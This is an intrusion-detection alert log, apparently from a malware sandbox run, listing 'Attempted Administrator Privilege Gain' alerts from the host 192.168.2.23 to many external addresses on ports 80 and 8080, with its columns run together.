                            2024-12-11T00:43:28.379771+010020292151Attempted Administrator Privilege Gain192.168.2.2344230217.205.0.1828080TCP
                            2024-12-11T00:43:29.284005+010020292151Attempted Administrator Privilege Gain192.168.2.234261646.243.211.1380TCP
                            2024-12-11T00:43:29.303168+010020292151Attempted Administrator Privilege Gain192.168.2.2348456192.181.205.1508080TCP
                            2024-12-11T00:43:29.312923+010020292151Attempted Administrator Privilege Gain192.168.2.235699832.247.7.1588080TCP
                            2024-12-11T00:43:29.328572+010020292151Attempted Administrator Privilege Gain192.168.2.2343506148.56.202.1780TCP
                            2024-12-11T00:43:29.343519+010020292151Attempted Administrator Privilege Gain192.168.2.234369017.99.132.438080TCP
                            2024-12-11T00:43:30.286826+010020292151Attempted Administrator Privilege Gain192.168.2.2332932144.217.176.1748080TCP
                            2024-12-11T00:43:30.294099+010020292151Attempted Administrator Privilege Gain192.168.2.2358340222.201.49.848080TCP
                            2024-12-11T00:43:30.331876+010020292151Attempted Administrator Privilege Gain192.168.2.235419889.17.140.798080TCP
                            2024-12-11T00:43:30.341320+010020292151Attempted Administrator Privilege Gain192.168.2.2344918128.41.167.688080TCP
                            2024-12-11T00:43:30.373282+010020292151Attempted Administrator Privilege Gain192.168.2.234083016.63.102.2438080TCP
                            2024-12-11T00:43:31.379169+010020292151Attempted Administrator Privilege Gain192.168.2.234959667.144.133.1558080TCP
                            2024-12-11T00:43:32.286165+010020292151Attempted Administrator Privilege Gain192.168.2.233908461.15.27.22580TCP
                            2024-12-11T00:43:32.305936+010020292151Attempted Administrator Privilege Gain192.168.2.2339230157.15.102.4480TCP
                            2024-12-11T00:43:32.320188+010020292151Attempted Administrator Privilege Gain192.168.2.234410498.140.251.2008080TCP
                            2024-12-11T00:43:32.351402+010020292151Attempted Administrator Privilege Gain192.168.2.234591426.89.112.14580TCP
                            2024-12-11T00:43:32.378806+010020292151Attempted Administrator Privilege Gain192.168.2.235104450.138.173.2448080TCP
                            2024-12-11T00:43:32.379176+010020292151Attempted Administrator Privilege Gain192.168.2.2354690195.50.11.6080TCP
                            2024-12-11T00:43:32.389441+010020292151Attempted Administrator Privilege Gain192.168.2.2336458101.115.94.17780TCP
                            2024-12-11T00:43:36.301326+010020292151Attempted Administrator Privilege Gain192.168.2.2334218177.17.55.15080TCP
                            2024-12-11T00:43:36.375429+010020292151Attempted Administrator Privilege Gain192.168.2.235879457.103.185.1248080TCP
                            2024-12-11T00:43:37.290931+010020292151Attempted Administrator Privilege Gain192.168.2.233564230.28.21.16380TCP
                            2024-12-11T00:43:37.364713+010020292151Attempted Administrator Privilege Gain192.168.2.23349689.177.77.21680TCP
                            2024-12-11T00:43:39.288300+010020292151Attempted Administrator Privilege Gain192.168.2.2339426175.74.235.21780TCP
                            2024-12-11T00:43:39.325523+010020292151Attempted Administrator Privilege Gain192.168.2.2349922150.93.111.2128080TCP
                            2024-12-11T00:43:39.347575+010020292151Attempted Administrator Privilege Gain192.168.2.2349386120.56.66.3180TCP
                            2024-12-11T00:43:40.284073+010020292151Attempted Administrator Privilege Gain192.168.2.2359532151.71.55.8980TCP
                            2024-12-11T00:43:40.304768+010020292151Attempted Administrator Privilege Gain192.168.2.2338120215.143.219.2548080TCP
                            2024-12-11T00:43:40.345769+010020292151Attempted Administrator Privilege Gain192.168.2.2351964105.19.219.19380TCP
                            2024-12-11T00:43:40.357800+010020292151Attempted Administrator Privilege Gain192.168.2.234238675.12.144.23480TCP
                            2024-12-11T00:43:40.372668+010020292151Attempted Administrator Privilege Gain192.168.2.235429235.253.237.2108080TCP
                            2024-12-11T00:43:41.350329+010020292151Attempted Administrator Privilege Gain192.168.2.2341928195.18.48.580TCP
                            2024-12-11T00:43:41.350699+010020292151Attempted Administrator Privilege Gain192.168.2.2343248179.107.147.2248080TCP
                            2024-12-11T00:43:43.320023+010020292151Attempted Administrator Privilege Gain192.168.2.233882875.3.26.2008080TCP
                            2024-12-11T00:43:43.356689+010020292151Attempted Administrator Privilege Gain192.168.2.2357250128.2.171.7580TCP
                            2024-12-11T00:43:44.323847+010020292151Attempted Administrator Privilege Gain192.168.2.234198496.245.28.14980TCP
                            2024-12-11T00:43:44.384908+010020292151Attempted Administrator Privilege Gain192.168.2.2335660190.32.214.11980TCP
                            2024-12-11T00:43:46.303675+010020292151Attempted Administrator Privilege Gain192.168.2.234516495.174.31.16780TCP
                            2024-12-11T00:43:46.345129+010020292151Attempted Administrator Privilege Gain192.168.2.2357512192.239.126.2218080TCP
                            2024-12-11T00:43:46.384712+010020292151Attempted Administrator Privilege Gain192.168.2.235511884.156.8.8380TCP
                            2024-12-11T00:43:46.385820+010020292151Attempted Administrator Privilege Gain192.168.2.2337172213.222.234.1558080TCP
                            2024-12-11T00:43:47.291715+010020292151Attempted Administrator Privilege Gain192.168.2.2339160110.71.190.2518080TCP
                            2024-12-11T00:43:48.289155+010020292151Attempted Administrator Privilege Gain192.168.2.2344612142.162.134.1838080TCP
                            2024-12-11T00:43:48.290623+010020292151Attempted Administrator Privilege Gain192.168.2.2337358152.54.31.24180TCP
                            2024-12-11T00:43:48.297496+010020292151Attempted Administrator Privilege Gain192.168.2.2346264163.129.106.16780TCP
                            2024-12-11T00:43:48.307994+010020292151Attempted Administrator Privilege Gain192.168.2.2358724201.229.9.3880TCP
                            2024-12-11T00:43:48.330321+010020292151Attempted Administrator Privilege Gain192.168.2.2356128174.156.182.298080TCP
                            2024-12-11T00:43:49.328965+010020292151Attempted Administrator Privilege Gain192.168.2.233710446.170.61.758080TCP
                            2024-12-11T00:43:49.386645+010020292151Attempted Administrator Privilege Gain192.168.2.233647848.202.100.138080TCP
                            2024-12-11T00:43:50.289944+010020292151Attempted Administrator Privilege Gain192.168.2.2346254184.138.242.1058080TCP
                            2024-12-11T00:43:51.315699+010020292151Attempted Administrator Privilege Gain192.168.2.233890074.187.153.2478080TCP
                            2024-12-11T00:43:52.326707+010020292151Attempted Administrator Privilege Gain192.168.2.2343266120.94.179.488080TCP
                            2024-12-11T00:43:53.336484+010020292151Attempted Administrator Privilege Gain192.168.2.235603837.139.68.708080TCP
                            2024-12-11T00:43:54.312564+010020292151Attempted Administrator Privilege Gain192.168.2.2338208154.208.202.2248080TCP
                            2024-12-11T00:43:54.320206+010020292151Attempted Administrator Privilege Gain192.168.2.2355666102.178.19.1738080TCP
                            2024-12-11T00:43:54.357046+010020292151Attempted Administrator Privilege Gain192.168.2.234424250.49.69.8280TCP
                            2024-12-11T00:43:54.359965+010020292151Attempted Administrator Privilege Gain192.168.2.2360238140.119.137.6880TCP
                            2024-12-11T00:43:54.361790+010020292151Attempted Administrator Privilege Gain192.168.2.2354044139.49.74.13280TCP
                            2024-12-11T00:43:56.295123+010020292151Attempted Administrator Privilege Gain192.168.2.2344122165.47.104.2448080TCP
                            2024-12-11T00:43:56.296576+010020292151Attempted Administrator Privilege Gain192.168.2.235842264.254.44.8580TCP
                            2024-12-11T00:43:56.366493+010020292151Attempted Administrator Privilege Gain192.168.2.2334364140.253.133.278080TCP
                            2024-12-11T00:43:57.313011+010020292151Attempted Administrator Privilege Gain192.168.2.2341844102.24.78.2528080TCP
                            2024-12-11T00:43:57.333724+010020292151Attempted Administrator Privilege Gain192.168.2.2349916144.227.196.10080TCP
                            2024-12-11T00:43:58.327556+010020292151Attempted Administrator Privilege Gain192.168.2.2360298165.218.169.1478080TCP
                            2024-12-11T00:43:58.336304+010020292151Attempted Administrator Privilege Gain192.168.2.235853223.32.17.1908080TCP
                            2024-12-11T00:43:58.369553+010020292151Attempted Administrator Privilege Gain192.168.2.23501703.3.120.1158080TCP
                            2024-12-11T00:43:58.374641+010020292151Attempted Administrator Privilege Gain192.168.2.2360128209.120.9.278080TCP
                            2024-12-11T00:43:59.078940+010020292151Attempted Administrator Privilege Gain192.168.2.2345186115.9.47.48080TCP
                            2024-12-11T00:43:59.320929+010020292151Attempted Administrator Privilege Gain192.168.2.234845046.166.100.14080TCP
                            2024-12-11T00:43:59.324219+010020292151Attempted Administrator Privilege Gain192.168.2.23352509.158.231.228080TCP
                            2024-12-11T00:43:59.352584+010020292151Attempted Administrator Privilege Gain192.168.2.235729623.245.92.2380TCP
                            2024-12-11T00:43:59.383504+010020292151Attempted Administrator Privilege Gain192.168.2.2344244156.24.118.3780TCP
                            2024-12-11T00:44:00.290393+010020292151Attempted Administrator Privilege Gain192.168.2.2347448144.234.158.1738080TCP
                            2024-12-11T00:44:01.282016+010020292151Attempted Administrator Privilege Gain192.168.2.2356534193.97.60.2118080TCP
                            2024-12-11T00:44:01.335966+010020292151Attempted Administrator Privilege Gain192.168.2.234931212.43.248.20880TCP
                            2024-12-11T00:44:02.282400+010020292151Attempted Administrator Privilege Gain192.168.2.2335746111.106.251.15480TCP
                            2024-12-11T00:44:02.309721+010020292151Attempted Administrator Privilege Gain192.168.2.234438041.219.167.2418080TCP
                            2024-12-11T00:44:03.379830+010020292151Attempted Administrator Privilege Gain192.168.2.234198089.50.40.6380TCP
                            2024-12-11T00:44:04.346343+010020292151Attempted Administrator Privilege Gain192.168.2.233351456.123.14.3380TCP
                            2024-12-11T00:44:04.355942+010020292151Attempted Administrator Privilege Gain192.168.2.234534811.9.68.1578080TCP
                            2024-12-11T00:44:04.370198+010020292151Attempted Administrator Privilege Gain192.168.2.2348050159.178.106.618080TCP
                            2024-12-11T00:44:05.321691+010020292151Attempted Administrator Privilege Gain192.168.2.2346300174.65.142.1778080TCP
                            2024-12-11T00:44:05.347895+010020292151Attempted Administrator Privilege Gain192.168.2.2337364112.68.239.8480TCP
                            2024-12-11T00:44:05.370704+010020292151Attempted Administrator Privilege Gain192.168.2.233695480.219.171.1118080TCP
                            2024-12-11T00:44:05.377024+010020292151Attempted Administrator Privilege Gain192.168.2.233688877.45.35.7580TCP
                            2024-12-11T00:44:05.385651+010020292151Attempted Administrator Privilege Gain192.168.2.2358768126.206.16.1908080TCP
                            2024-12-11T00:44:06.375018+010020292151Attempted Administrator Privilege Gain192.168.2.2344486149.208.223.12580TCP
                            2024-12-11T00:44:06.387488+010020292151Attempted Administrator Privilege Gain192.168.2.2333388173.214.173.1628080TCP
                            2024-12-11T00:44:07.301496+010020292151Attempted Administrator Privilege Gain192.168.2.2360982192.222.110.2108080TCP
                            2024-12-11T00:44:07.335524+010020292151Attempted Administrator Privilege Gain192.168.2.2360942184.39.177.2098080TCP
                            2024-12-11T00:44:07.370761+010020292151Attempted Administrator Privilege Gain192.168.2.2335710162.113.251.15780TCP
                            2024-12-11T00:44:07.377149+010020292151Attempted Administrator Privilege Gain192.168.2.2338566170.227.129.568080TCP
                            2024-12-11T00:44:08.287466+010020292151Attempted Administrator Privilege Gain192.168.2.2342536219.246.122.2158080TCP
                            2024-12-11T00:44:08.365163+010020292151Attempted Administrator Privilege Gain192.168.2.2349738176.66.53.9980TCP
                            2024-12-11T00:44:08.377241+010020292151Attempted Administrator Privilege Gain192.168.2.2354296166.156.55.12080TCP
                            2024-12-11T00:44:09.349814+010020292151Attempted Administrator Privilege Gain192.168.2.2359358117.40.15.12380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-11T00:43:17.976552+010020270631Attempted Administrator Privilege Gain192.168.2.2341912152.158.234.1980TCP
                            2024-12-11T00:43:18.085937+010020270631Attempted Administrator Privilege Gain192.168.2.234215471.44.225.11280TCP
                            2024-12-11T00:43:18.087487+010020270631Attempted Administrator Privilege Gain192.168.2.2351548182.98.49.248080TCP
                            2024-12-11T00:43:18.087768+010020270631Attempted Administrator Privilege Gain192.168.2.2360422184.96.7.288080TCP
                            2024-12-11T00:43:18.088492+010020270631Attempted Administrator Privilege Gain192.168.2.235642447.30.123.2128080TCP
                            2024-12-11T00:43:18.088729+010020270631Attempted Administrator Privilege Gain192.168.2.2353384162.198.43.2278080TCP
                            2024-12-11T00:43:18.089988+010020270631Attempted Administrator Privilege Gain192.168.2.234867640.223.116.25480TCP
                            2024-12-11T00:43:18.090642+010020270631Attempted Administrator Privilege Gain192.168.2.233863256.53.8.680TCP
                            2024-12-11T00:43:18.090878+010020270631Attempted Administrator Privilege Gain192.168.2.2341714113.229.7.21380TCP
                            2024-12-11T00:43:18.092271+010020270631Attempted Administrator Privilege Gain192.168.2.235488023.173.106.2780TCP
                            2024-12-11T00:43:18.092652+010020270631Attempted Administrator Privilege Gain192.168.2.2351378113.145.142.2028080TCP
                            2024-12-11T00:43:18.093079+010020270631Attempted Administrator Privilege Gain192.168.2.23552649.58.179.10980TCP
                            2024-12-11T00:43:18.093396+010020270631Attempted Administrator Privilege Gain192.168.2.2354774204.81.207.1888080TCP
                            2024-12-11T00:43:18.093584+010020270631Attempted Administrator Privilege Gain192.168.2.2351398210.181.40.1428080TCP
                            2024-12-11T00:43:18.093768+010020270631Attempted Administrator Privilege Gain192.168.2.2343226206.130.7.228080TCP
                            2024-12-11T00:43:18.094600+010020270631Attempted Administrator Privilege Gain192.168.2.2354806143.186.21.17380TCP
                            2024-12-11T00:43:18.094952+010020270631Attempted Administrator Privilege Gain192.168.2.2353188118.35.168.1548080TCP
                            2024-12-11T00:43:18.095296+010020270631Attempted Administrator Privilege Gain192.168.2.2339352222.38.112.22880TCP
                            2024-12-11T00:43:18.096708+010020270631Attempted Administrator Privilege Gain192.168.2.23406309.109.75.1278080TCP
                            2024-12-11T00:43:18.117093+010020270631Attempted Administrator Privilege Gain192.168.2.2341280215.50.246.238080TCP
                            2024-12-11T00:43:18.227835+010020270631Attempted Administrator Privilege Gain192.168.2.2337392207.198.77.4580TCP
                            2024-12-11T00:43:18.228788+010020270631Attempted Administrator Privilege Gain192.168.2.2339344205.19.156.15480TCP
                            2024-12-11T00:43:18.229284+010020270631Attempted Administrator Privilege Gain192.168.2.2341916126.179.23.11180TCP
                            2024-12-11T00:43:18.242728+010020270631Attempted Administrator Privilege Gain192.168.2.2358674163.115.127.19180TCP
                            2024-12-11T00:43:18.245597+010020270631Attempted Administrator Privilege Gain192.168.2.2337292149.210.29.20180TCP
                            2024-12-11T00:43:18.245999+010020270631Attempted Administrator Privilege Gain192.168.2.233652291.41.16.1188080TCP
                            2024-12-11T00:43:18.247533+010020270631Attempted Administrator Privilege Gain192.168.2.233795690.24.179.1638080TCP
                            2024-12-11T00:43:18.248918+010020270631Attempted Administrator Privilege Gain192.168.2.235906667.156.164.3880TCP
                            2024-12-11T00:43:18.249169+010020270631Attempted Administrator Privilege Gain192.168.2.2359380212.148.153.19280TCP
                            2024-12-11T00:43:18.320269+010020270631Attempted Administrator Privilege Gain192.168.2.235974056.225.44.2208080TCP
                            2024-12-11T00:43:18.320489+010020270631Attempted Administrator Privilege Gain192.168.2.234212092.244.233.2068080TCP
                            2024-12-11T00:43:18.321398+010020270631Attempted Administrator Privilege Gain192.168.2.236070296.114.30.20780TCP
                            2024-12-11T00:43:18.335791+010020270631Attempted Administrator Privilege Gain192.168.2.2333314153.28.27.688080TCP
                            2024-12-11T00:43:18.336012+010020270631Attempted Administrator Privilege Gain192.168.2.236004493.98.197.17980TCP
                            2024-12-11T00:43:18.337927+010020270631Attempted Administrator Privilege Gain192.168.2.2358704134.145.254.1758080TCP
                            2024-12-11T00:43:18.338744+010020270631Attempted Administrator Privilege Gain192.168.2.234525045.22.47.1038080TCP
                            2024-12-11T00:43:18.339665+010020270631Attempted Administrator Privilege Gain192.168.2.234246682.213.155.868080TCP
                            2024-12-11T00:43:18.343273+010020270631Attempted Administrator Privilege Gain192.168.2.2353022117.238.33.988080TCP
                            2024-12-11T00:43:18.343657+010020270631Attempted Administrator Privilege Gain192.168.2.234736293.52.53.08080TCP
                            2024-12-11T00:43:18.343760+010020270631Attempted Administrator Privilege Gain192.168.2.234401847.80.200.9580TCP
                            2024-12-11T00:43:18.343923+010020270631Attempted Administrator Privilege Gain192.168.2.23524108.202.67.2298080TCP
                            2024-12-11T00:43:18.344010+010020270631Attempted Administrator Privilege Gain192.168.2.234121496.205.70.20280TCP
                            2024-12-11T00:43:28.461097+010020270631Attempted Administrator Privilege Gain192.168.2.235347671.213.59.19080TCP
                            2024-12-11T00:43:28.461344+010020270631Attempted Administrator Privilege Gain192.168.2.236009054.126.187.15780TCP
                            2024-12-11T00:43:28.461563+010020270631Attempted Administrator Privilege Gain192.168.2.235048491.32.136.6080TCP
                            2024-12-11T00:43:29.431107+010020270631Attempted Administrator Privilege Gain192.168.2.234085623.210.109.408080TCP
                            2024-12-11T00:43:29.431617+010020270631Attempted Administrator Privilege Gain192.168.2.2339800205.55.79.2368080TCP
                            2024-12-11T00:43:29.432231+010020270631Attempted Administrator Privilege Gain192.168.2.235295634.155.65.1928080TCP
                            2024-12-11T00:43:29.432529+010020270631Attempted Administrator Privilege Gain192.168.2.2356000156.9.96.4380TCP
                            2024-12-11T00:43:29.433189+010020270631Attempted Administrator Privilege Gain192.168.2.2356766148.104.170.2098080TCP
                            2024-12-11T00:43:29.433195+010020270631Attempted Administrator Privilege Gain192.168.2.2357392168.22.178.1618080TCP
                            2024-12-11T00:43:29.434543+010020270631Attempted Administrator Privilege Gain192.168.2.2353262137.77.114.15680TCP
                            2024-12-11T00:43:29.460925+010020270631Attempted Administrator Privilege Gain192.168.2.2346760103.136.18.24180TCP
                            2024-12-11T00:43:29.461525+010020270631Attempted Administrator Privilege Gain192.168.2.2340464174.191.244.58080TCP
                            2024-12-11T00:43:29.462247+010020270631Attempted Administrator Privilege Gain192.168.2.234049048.76.49.7380TCP
                            2024-12-11T00:43:29.539563+010020270631Attempted Administrator Privilege Gain192.168.2.2356064131.11.250.528080TCP
                            2024-12-11T00:43:29.539830+010020270631Attempted Administrator Privilege Gain192.168.2.2338914179.129.124.128080TCP
                            2024-12-11T00:43:29.540246+010020270631Attempted Administrator Privilege Gain192.168.2.2360010198.111.45.20380TCP
                            2024-12-11T00:43:29.540823+010020270631Attempted Administrator Privilege Gain192.168.2.2353700129.114.47.18780TCP
                            2024-12-11T00:43:29.541031+010020270631Attempted Administrator Privilege Gain192.168.2.2334116174.193.104.21780TCP
                            2024-12-11T00:43:29.541319+010020270631Attempted Administrator Privilege Gain192.168.2.2353702120.95.235.7180TCP
                            2024-12-11T00:43:29.542294+010020270631Attempted Administrator Privilege Gain192.168.2.2353116105.183.55.2128080TCP
                            2024-12-11T00:43:29.542301+010020270631Attempted Administrator Privilege Gain192.168.2.2353960117.138.201.2338080TCP
                            2024-12-11T00:43:29.542657+010020270631Attempted Administrator Privilege Gain192.168.2.233995476.56.4.878080TCP
                            2024-12-11T00:43:29.555034+010020270631Attempted Administrator Privilege Gain192.168.2.2334660175.193.203.4880TCP
                            2024-12-11T00:43:29.555045+010020270631Attempted Administrator Privilege Gain192.168.2.2338126113.43.66.28080TCP
                            2024-12-11T00:43:29.555834+010020270631Attempted Administrator Privilege Gain192.168.2.236022084.227.113.19380TCP
                            2024-12-11T00:43:29.556229+010020270631Attempted Administrator Privilege Gain192.168.2.2337266209.30.237.25180TCP
                            2024-12-11T00:43:29.570843+010020270631Attempted Administrator Privilege Gain192.168.2.233733264.90.223.11680TCP
                            2024-12-11T00:43:29.572159+010020270631Attempted Administrator Privilege Gain192.168.2.235879851.82.89.20680TCP
                            2024-12-11T00:43:29.572595+010020270631Attempted Administrator Privilege Gain192.168.2.235695634.70.187.1288080TCP
                            2024-12-11T00:43:29.573469+010020270631Attempted Administrator Privilege Gain192.168.2.2345748175.171.254.3780TCP
                            2024-12-11T00:43:29.573566+010020270631Attempted Administrator Privilege Gain192.168.2.2352688137.242.182.1948080TCP
                            2024-12-11T00:43:29.574483+010020270631Attempted Administrator Privilege Gain192.168.2.234716269.214.87.24180TCP
                            2024-12-11T00:43:29.576129+010020270631Attempted Administrator Privilege Gain192.168.2.2337822177.122.6.738080TCP
                            2024-12-11T00:43:29.576905+010020270631Attempted Administrator Privilege Gain192.168.2.2352762115.50.227.1658080TCP
                            2024-12-11T00:43:29.577437+010020270631Attempted Administrator Privilege Gain192.168.2.234888293.215.216.10680TCP
                            2024-12-11T00:43:29.577850+010020270631Attempted Administrator Privilege Gain192.168.2.235295649.74.230.1508080TCP
                            2024-12-11T00:43:29.578146+010020270631Attempted Administrator Privilege Gain192.168.2.2356034219.203.86.23680TCP
                            2024-12-11T00:43:29.578785+010020270631Attempted Administrator Privilege Gain192.168.2.235763619.148.27.1628080TCP
                            2024-12-11T00:43:29.579170+010020270631Attempted Administrator Privilege Gain192.168.2.2357576141.74.31.8680TCP
                            2024-12-11T00:43:29.579600+010020270631Attempted Administrator Privilege Gain192.168.2.2359710176.129.63.1748080TCP
                            2024-12-11T00:43:29.579790+010020270631Attempted Administrator Privilege Gain192.168.2.234490238.94.214.1048080TCP
                            2024-12-11T00:43:29.580477+010020270631Attempted Administrator Privilege Gain192.168.2.234072888.238.152.1258080TCP
                            2024-12-11T00:43:29.580971+010020270631Attempted Administrator Privilege Gain192.168.2.235718890.16.121.1478080TCP
                            2024-12-11T00:43:29.581167+010020270631Attempted Administrator Privilege Gain192.168.2.2360546191.152.135.2018080TCP
                            2024-12-11T00:43:29.582604+010020270631Attempted Administrator Privilege Gain192.168.2.23377584.33.109.1238080TCP
                            2024-12-11T00:43:29.583343+010020270631Attempted Administrator Privilege Gain192.168.2.2349966138.136.138.16580TCP
                            2024-12-11T00:43:29.583538+010020270631Attempted Administrator Privilege Gain192.168.2.2359308202.99.95.20580TCP
                            2024-12-11T00:43:29.584700+010020270631Attempted Administrator Privilege Gain192.168.2.2348968152.230.216.2080TCP
                            2024-12-11T00:43:29.587865+010020270631Attempted Administrator Privilege Gain192.168.2.2349482185.7.165.10080TCP
                            2024-12-11T00:43:29.587989+010020270631Attempted Administrator Privilege Gain192.168.2.2358272110.93.67.4780TCP
                            2024-12-11T00:43:29.588893+010020270631Attempted Administrator Privilege Gain192.168.2.233749850.241.123.1280TCP
                            2024-12-11T00:43:29.589034+010020270631Attempted Administrator Privilege Gain192.168.2.2340984143.26.169.10380TCP
                            2024-12-11T00:43:29.589428+010020270631Attempted Administrator Privilege Gain192.168.2.2338326168.135.70.17080TCP
                            2024-12-11T00:43:29.589707+010020270631Attempted Administrator Privilege Gain192.168.2.233678881.14.183.2298080TCP
                            2024-12-11T00:43:29.590760+010020270631Attempted Administrator Privilege Gain192.168.2.2340484218.127.6.16380TCP
                            2024-12-11T00:43:29.664273+010020270631Attempted Administrator Privilege Gain192.168.2.2348332172.201.78.23080TCP
                            2024-12-11T00:43:29.664363+010020270631Attempted Administrator Privilege Gain192.168.2.233763475.88.145.14780TCP
                            2024-12-11T00:43:29.664637+010020270631Attempted Administrator Privilege Gain192.168.2.2350746117.194.49.1278080TCP
                            2024-12-11T00:43:32.695756+010020270631Attempted Administrator Privilege Gain192.168.2.2347720187.43.112.1580TCP
                            2024-12-11T00:43:39.429832+010020270631Attempted Administrator Privilege Gain192.168.2.235438653.210.10.23480TCP
                            2024-12-11T00:43:39.429985+010020270631Attempted Administrator Privilege Gain192.168.2.2334596111.78.72.4080TCP
                            2024-12-11T00:43:39.461046+010020270631Attempted Administrator Privilege Gain192.168.2.2337210169.79.111.2508080TCP
                            2024-12-11T00:43:39.461424+010020270631Attempted Administrator Privilege Gain192.168.2.2336760121.246.12.21080TCP
                            2024-12-11T00:43:40.492413+010020270631Attempted Administrator Privilege Gain192.168.2.2357176136.96.254.1548080TCP
                            2024-12-11T00:43:40.664229+010020270631Attempted Administrator Privilege Gain192.168.2.2350662114.65.149.15480TCP
                            2024-12-11T00:43:40.711303+010020270631Attempted Administrator Privilege Gain192.168.2.2349524201.192.233.880TCP
                            2024-12-11T00:43:40.851887+010020270631Attempted Administrator Privilege Gain192.168.2.235710096.141.159.1018080TCP
                            2024-12-11T00:43:40.867327+010020270631Attempted Administrator Privilege Gain192.168.2.2334954150.213.241.2018080TCP
                            2024-12-11T00:43:41.742360+010020270631Attempted Administrator Privilege Gain192.168.2.2337984173.227.189.9580TCP
                            2024-12-11T00:43:41.742653+010020270631Attempted Administrator Privilege Gain192.168.2.234752457.237.49.2258080TCP
                            2024-12-11T00:43:41.836273+010020270631Attempted Administrator Privilege Gain192.168.2.234844419.230.61.21280TCP
                            2024-12-11T00:43:41.836370+010020270631Attempted Administrator Privilege Gain192.168.2.2350092141.55.34.2180TCP
                            2024-12-11T00:43:41.898721+010020270631Attempted Administrator Privilege Gain192.168.2.2336858142.20.61.2380TCP
                            2024-12-11T00:43:42.492822+010020270631Attempted Administrator Privilege Gain192.168.2.2335546179.33.8.258080TCP
                            2024-12-11T00:43:42.523770+010020270631Attempted Administrator Privilege Gain192.168.2.2340240219.82.14.20980TCP
                            2024-12-11T00:43:43.667397+010020270631Attempted Administrator Privilege Gain192.168.2.23561643.50.46.1768080TCP
                            2024-12-11T00:43:43.695718+010020270631Attempted Administrator Privilege Gain192.168.2.233863027.124.53.20380TCP
                            2024-12-11T00:43:43.814850+010020270631Attempted Administrator Privilege Gain192.168.2.234459274.188.6.778080TCP
                            2024-12-11T00:43:43.814868+010020270631Attempted Administrator Privilege Gain192.168.2.2360620215.230.190.2168080TCP
                            2024-12-11T00:43:43.914200+010020270631Attempted Administrator Privilege Gain192.168.2.235873253.86.41.9980TCP
                            2024-12-11T00:43:47.430470+010020270631Attempted Administrator Privilege Gain192.168.2.233462434.49.97.2158080TCP
                            2024-12-11T00:43:47.523871+010020270631Attempted Administrator Privilege Gain192.168.2.2359720104.87.39.738080TCP
                            2024-12-11T00:43:47.540140+010020270631Attempted Administrator Privilege Gain192.168.2.2355656115.15.94.5180TCP
                            2024-12-11T00:43:47.540220+010020270631Attempted Administrator Privilege Gain192.168.2.235864639.61.64.13880TCP
                            2024-12-11T00:43:47.540383+010020270631Attempted Administrator Privilege Gain192.168.2.236082220.39.219.198080TCP
                            2024-12-11T00:43:48.445608+010020270631Attempted Administrator Privilege Gain192.168.2.233284416.222.179.12380TCP
                            2024-12-11T00:43:48.462567+010020270631Attempted Administrator Privilege Gain192.168.2.2356600177.244.168.8280TCP
                            2024-12-11T00:43:48.492517+010020270631Attempted Administrator Privilege Gain192.168.2.2351528172.218.152.1098080TCP
                            2024-12-11T00:43:50.477295+010020270631Attempted Administrator Privilege Gain192.168.2.234514018.76.225.25480TCP
                            2024-12-11T00:43:50.493217+010020270631Attempted Administrator Privilege Gain192.168.2.235466660.224.26.528080TCP
                            2024-12-11T00:43:50.493454+010020270631Attempted Administrator Privilege Gain192.168.2.234105072.239.95.1888080TCP
                            2024-12-11T00:43:50.586342+010020270631Attempted Administrator Privilege Gain192.168.2.2353758179.118.33.8080TCP
                            2024-12-11T00:43:51.430412+010020270631Attempted Administrator Privilege Gain192.168.2.2358964192.187.71.24780TCP
                            2024-12-11T00:43:51.445786+010020270631Attempted Administrator Privilege Gain192.168.2.2355748183.56.155.1280TCP
                            2024-12-11T00:43:51.461504+010020270631Attempted Administrator Privilege Gain192.168.2.233532414.152.145.258080TCP
                            2024-12-11T00:43:51.539644+010020270631Attempted Administrator Privilege Gain192.168.2.2337322137.128.167.608080TCP
                            2024-12-11T00:43:52.415388+010020270631Attempted Administrator Privilege Gain192.168.2.2344078132.209.72.1538080TCP
                            2024-12-11T00:43:52.461566+010020270631Attempted Administrator Privilege Gain192.168.2.2345838123.77.40.2298080TCP
                            2024-12-11T00:43:52.461978+010020270631Attempted Administrator Privilege Gain192.168.2.2347778170.118.4.358080TCP
                            2024-12-11T00:43:52.492723+010020270631Attempted Administrator Privilege Gain192.168.2.2335670179.153.43.1358080TCP
                            2024-12-11T00:43:54.461481+010020270631Attempted Administrator Privilege Gain192.168.2.2359574175.27.152.19880TCP
                            2024-12-11T00:43:55.417069+010020270631Attempted Administrator Privilege Gain192.168.2.2334756131.92.123.178080TCP
                            2024-12-11T00:43:55.431254+010020270631Attempted Administrator Privilege Gain192.168.2.235884679.57.139.2188080TCP
                            2024-12-11T00:43:55.492747+010020270631Attempted Administrator Privilege Gain192.168.2.2356288163.199.121.380TCP
                            2024-12-11T00:43:57.414837+010020270631Attempted Administrator Privilege Gain192.168.2.2341850205.175.182.778080TCP
                            2024-12-11T00:43:57.586480+010020270631Attempted Administrator Privilege Gain192.168.2.2337708154.144.254.24280TCP
                            2024-12-11T00:43:58.430560+010020270631Attempted Administrator Privilege Gain192.168.2.235468227.2.41.24280TCP
                            2024-12-11T00:43:58.430685+010020270631Attempted Administrator Privilege Gain192.168.2.233305856.243.106.1198080TCP
                            2024-12-11T00:43:58.430883+010020270631Attempted Administrator Privilege Gain192.168.2.2342004180.145.130.5180TCP
                            2024-12-11T00:43:58.446116+010020270631Attempted Administrator Privilege Gain192.168.2.2351676163.114.7.6080TCP
                            2024-12-11T00:43:58.446271+010020270631Attempted Administrator Privilege Gain192.168.2.234337227.130.12.1680TCP
                            2024-12-11T00:43:58.492783+010020270631Attempted Administrator Privilege Gain192.168.2.236012878.39.176.958080TCP
                            2024-12-11T00:43:58.524030+010020270631Attempted Administrator Privilege Gain192.168.2.233650411.240.129.25480TCP
                            2024-12-11T00:43:59.399121+010020270631Attempted Administrator Privilege Gain192.168.2.2332946143.92.171.2388080TCP
                            2024-12-11T00:44:00.414942+010020270631Attempted Administrator Privilege Gain192.168.2.2355360126.188.12.12680TCP
                            2024-12-11T00:44:01.464156+010020270631Attempted Administrator Privilege Gain192.168.2.234577230.60.58.1838080TCP
                            2024-12-11T00:44:01.508430+010020270631Attempted Administrator Privilege Gain192.168.2.233659650.110.115.308080TCP
                            2024-12-11T00:44:01.727277+010020270631Attempted Administrator Privilege Gain192.168.2.2346258128.148.246.688080TCP
                            2024-12-11T00:44:02.446195+010020270631Attempted Administrator Privilege Gain192.168.2.2336814124.76.112.2108080TCP
                            2024-12-11T00:44:02.461478+010020270631Attempted Administrator Privilege Gain192.168.2.233395620.68.156.1588080TCP
